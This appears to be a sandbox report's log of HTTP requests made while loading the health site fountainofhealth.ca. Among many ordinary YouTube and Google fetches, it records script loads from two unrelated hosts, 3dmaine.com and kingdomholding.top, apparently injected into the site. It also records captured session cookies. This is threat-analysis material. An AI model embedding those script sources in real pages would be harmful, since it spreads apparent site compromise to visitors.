Source: global traffic	HTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1host: static.cloudflareinsights.comorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /embed/h15NcT6UXh0?si=YrXkudamh5IoggTR HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/www-player.css HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=ReHAOhqWrU8cookie: __Secure-ROLLOUT_TOKEN=CN33uamwubWmXRD6lYjkvtONAxj6lYjkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=f3ynVHy8dD0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGg%3D%3Dpriority: u=0
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/embed.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=-1fRDkvXcbocookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=C_agYD195PAcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3Dpriority: u=1
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=-1fRDkvXcbocookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=C_agYD195PAcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3Dpriority: u=1
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/sticky-header.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/container-inline.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /d.js HTTP/1.1host: 3dmaine.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/base.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=-1fRDkvXcbocookie: __Secure-ROLLOUT_TOKEN=CMOvz4P_4ZCdExCvy4jkvtONAxivy4jkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=C_agYD195PAcookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgOg%3D%3Dpriority: u=1
Source: global traffic	HTTP traffic detected: GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2 HTTP/1.1host: fonts.gstatic.comorigin: https://www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /s/player/3b4b7883/player_ias.vflset/en_US/remote.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3D
Source: global traffic	HTTP traffic detected: GET /ss/fon.js HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCTwafuki5vRADsDtfgeiF3qyS0Ew HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /instream/ad_status.js HTTP/1.1host: static.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/js.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/details.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/position-container.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/progress.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.cssaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /js/th/qGrsDjDjXxcnxnpvJpNLwNqYSxdC2jzwhgPLO7suYzE.js HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /generate_204?UUowYQ HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3Dpriority: i
Source: global traffic	HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /generate_204?--7krg HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3Dpriority: i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCTwafuki5vRADsDtfgeiF3qyS0Ew HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /generate_204?6bdlyg HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3Dpriority: i
